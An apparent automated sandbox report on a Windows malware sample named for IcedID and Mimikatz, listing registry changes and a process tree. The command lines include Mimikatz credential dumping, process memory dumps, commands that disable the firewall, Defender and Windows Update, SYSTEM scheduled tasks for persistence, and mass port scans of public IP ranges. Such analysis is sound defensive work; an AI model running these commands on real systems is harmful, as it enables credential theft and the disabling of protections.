\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ vkdejee.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing vkdejee.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" vkdejee.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2772 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4592 2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4592 2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3884 vkdejee.exe Token: SeDebugPrivilege 856 vkdejee.exe Token: SeDebugPrivilege 2652 vfshost.exe Token: SeDebugPrivilege 2676 ibibzztte.exe Token: SeLockMemoryPrivilege 5084 fpibei.exe Token: SeLockMemoryPrivilege 5084 fpibei.exe Token: SeDebugPrivilege 4592 ibibzztte.exe Token: SeDebugPrivilege 852 ibibzztte.exe Token: SeDebugPrivilege 1084 ibibzztte.exe Token: SeDebugPrivilege 928 ibibzztte.exe Token: SeDebugPrivilege 3884 ibibzztte.exe Token: SeDebugPrivilege 1352 ibibzztte.exe Token: SeDebugPrivilege 1796 ibibzztte.exe Token: SeDebugPrivilege 2108 ibibzztte.exe Token: SeDebugPrivilege 4960 ibibzztte.exe Token: SeDebugPrivilege 448 ibibzztte.exe Token: SeDebugPrivilege 4544 ibibzztte.exe Token: SeDebugPrivilege 1976 ibibzztte.exe Token: SeDebugPrivilege 4080 ibibzztte.exe Token: SeDebugPrivilege 3880 ibibzztte.exe Token: SeDebugPrivilege 544 ibibzztte.exe Token: SeDebugPrivilege 5016 ibibzztte.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4592 2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe 4592 2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe 3884 vkdejee.exe 3884 vkdejee.exe 856 vkdejee.exe 856 vkdejee.exe 1676 xohudmc.exe 5092 nslfoo.exe 3588 vkdejee.exe 3588 vkdejee.exe 5280 vkdejee.exe 5280 vkdejee.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4592 wrote to memory of 1052 4592 2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe 81 PID 4592 wrote to memory of 1052 4592 2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe 81 PID 4592 wrote to memory of 1052 4592 2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe 81 PID 1052 wrote to memory of 2772 1052 cmd.exe 83 PID 1052 wrote to memory of 2772 1052 cmd.exe 83 PID 1052 wrote to memory of 2772 1052 cmd.exe 83 PID 1052 wrote to memory of 3884 1052 cmd.exe 91 PID 1052 wrote to memory of 3884 1052 cmd.exe 91 PID 1052 wrote to memory of 3884 1052 cmd.exe 91 PID 856 wrote to memory of 1584 856 vkdejee.exe 93 PID 856 wrote to memory of 1584 856 vkdejee.exe 93 PID 856 wrote to memory of 1584 856 vkdejee.exe 93 PID 1584 wrote to memory of 3600 1584 cmd.exe 95 PID 1584 wrote to memory of 3600 1584 cmd.exe 95 PID 1584 wrote to memory of 3600 1584 cmd.exe 95 PID 1584 wrote to memory of 3628 1584 cmd.exe 96 PID 1584 wrote to memory of 3628 1584 cmd.exe 96 PID 1584 wrote to memory of 3628 1584 cmd.exe 96 PID 1584 wrote to memory of 5112 1584 cmd.exe 97 PID 1584 wrote to memory of 5112 1584 cmd.exe 97 PID 1584 wrote to memory of 5112 1584 cmd.exe 97 PID 1584 wrote to memory of 372 1584 cmd.exe 98 PID 1584 wrote to memory of 372 1584 cmd.exe 98 PID 1584 wrote to memory of 372 1584 cmd.exe 98 PID 1584 wrote to memory of 4680 1584 cmd.exe 99 PID 1584 wrote to memory of 4680 1584 cmd.exe 99 PID 1584 wrote to memory of 4680 1584 cmd.exe 99 PID 1584 wrote to memory of 3852 1584 cmd.exe 100 PID 1584 wrote to memory of 3852 1584 cmd.exe 100 PID 1584 wrote to memory of 3852 1584 cmd.exe 100 PID 856 wrote to memory of 1112 856 vkdejee.exe 101 PID 856 wrote to memory of 1112 856 vkdejee.exe 101 PID 856 wrote to memory of 1112 856 vkdejee.exe 101 PID 856 wrote to memory of 3268 856 vkdejee.exe 104 PID 856 wrote to memory of 3268 856 vkdejee.exe 104 PID 856 wrote to memory of 3268 856 vkdejee.exe 104 PID 856 wrote to memory of 2928 856 vkdejee.exe 106 PID 856 wrote to memory of 2928 856 vkdejee.exe 106 PID 856 wrote to memory of 2928 856 vkdejee.exe 106 PID 856 wrote to memory of 4292 856 vkdejee.exe 110 PID 856 wrote to memory of 4292 856 vkdejee.exe 110 PID 856 wrote to memory of 4292 856 vkdejee.exe 110 PID 4292 wrote to memory of 1084 4292 cmd.exe 112 PID 4292 wrote to memory of 1084 4292 cmd.exe 112 PID 4292 wrote to memory of 1084 4292 cmd.exe 112 PID 1084 wrote to memory of 2116 1084 wpcap.exe 113 PID 1084 wrote to memory of 2116 1084 wpcap.exe 113 PID 1084 wrote to memory of 2116 1084 wpcap.exe 113 PID 2116 wrote to memory of 4144 2116 net.exe 115 PID 2116 wrote to memory of 4144 2116 net.exe 115 PID 2116 wrote to memory of 4144 2116 net.exe 115 PID 1084 wrote to memory of 3776 1084 wpcap.exe 116 PID 1084 wrote to memory of 3776 1084 wpcap.exe 116 PID 1084 wrote to memory of 3776 1084 wpcap.exe 116 PID 3776 wrote to memory of 4544 3776 net.exe 118 PID 3776 wrote to memory of 4544 3776 net.exe 118 PID 3776 wrote to memory of 4544 3776 net.exe 118 PID 1084 wrote to memory of 1696 1084 wpcap.exe 119 PID 1084 wrote to memory of 1696 1084 wpcap.exe 119 PID 1084 wrote to memory of 1696 1084 wpcap.exe 119 PID 1696 wrote to memory of 4224 1696 net.exe 121 PID 1696 wrote to memory of 4224 1696 net.exe 121 PID 1696 wrote to memory of 4224 1696 net.exe 121 PID 1084 wrote to memory of 3204 1084 wpcap.exe 122
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1700
-
C:\Windows\TEMP\rttutifin\fpibei.exe"C:\Windows\TEMP\rttutifin\fpibei.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5084
-
-
C:\Users\Admin\AppData\Local\Temp\2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gibpmken\vkdejee.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2772
-
-
C:\Windows\gibpmken\vkdejee.exeC:\Windows\gibpmken\vkdejee.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3884
-
-
-
C:\Windows\gibpmken\vkdejee.exeC:\Windows\gibpmken\vkdejee.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3600
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5112
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4680
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3852
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:1112
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:3268
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:2928
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\bbrcgicuu\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\umubtmbps\bbrcgicuu\wpcap.exeC:\Windows\umubtmbps\bbrcgicuu\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4144
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4544
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:4224
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:3204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1788
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3512
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1920
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3588
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:556
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\umubtmbps\bbrcgicuu\Scant.txt2⤵PID:968
-
C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exeC:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\umubtmbps\bbrcgicuu\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\umubtmbps\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4116 -
C:\Windows\umubtmbps\Corporate\vfshost.exeC:\Windows\umubtmbps\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ilejsubhf" /ru system /tr "cmd /c C:\Windows\ime\vkdejee.exe"2⤵PID:3304
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ilejsubhf" /ru system /tr "cmd /c C:\Windows\ime\vkdejee.exe"3⤵
- Creates scheduled task(s)
PID:3648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uidenmpcg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F"2⤵PID:3524
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "uidenmpcg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nztfembbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F"2⤵PID:2676
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nztfembbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:5056
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:216
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:3768
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:2680
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4320
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:4224
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:4940
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:1788
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4964
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:3888
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:1488
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:2228
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2772
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:4420
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:2860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:1316
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:1508
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:2060
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:396
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:2392
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:4584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:432
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:4660
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:1980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:4112
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:3504
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:756
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:2936
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:5096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:2876
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:4252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:1112
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:3268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:4740
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:5116
-
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 776 C:\Windows\TEMP\umubtmbps\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1676
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 60 C:\Windows\TEMP\umubtmbps\60.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4592
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1700 C:\Windows\TEMP\umubtmbps\1700.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2500 C:\Windows\TEMP\umubtmbps\2500.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2716 C:\Windows\TEMP\umubtmbps\2716.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:928
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2792 C:\Windows\TEMP\umubtmbps\2792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3884
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3120 C:\Windows\TEMP\umubtmbps\3120.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3940 C:\Windows\TEMP\umubtmbps\3940.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4036 C:\Windows\TEMP\umubtmbps\4036.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1156 C:\Windows\TEMP\umubtmbps\1156.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3172 C:\Windows\TEMP\umubtmbps\3172.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4128 C:\Windows\TEMP\umubtmbps\4128.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4384 C:\Windows\TEMP\umubtmbps\4384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4232 C:\Windows\TEMP\umubtmbps\4232.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1960 C:\Windows\TEMP\umubtmbps\1960.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3880
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1876 C:\Windows\TEMP\umubtmbps\1876.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4564 C:\Windows\TEMP\umubtmbps\4564.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\umubtmbps\bbrcgicuu\scan.bat2⤵PID:5024
-
C:\Windows\umubtmbps\bbrcgicuu\fuinnkdmr.exefuinnkdmr.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:3220
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3180
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3548
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4988
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:5252
-
-
-
C:\Windows\SysWOW64\nslfoo.exeC:\Windows\SysWOW64\nslfoo.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5092
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F1⤵PID:4472
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3604
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F2⤵PID:4968
-
-
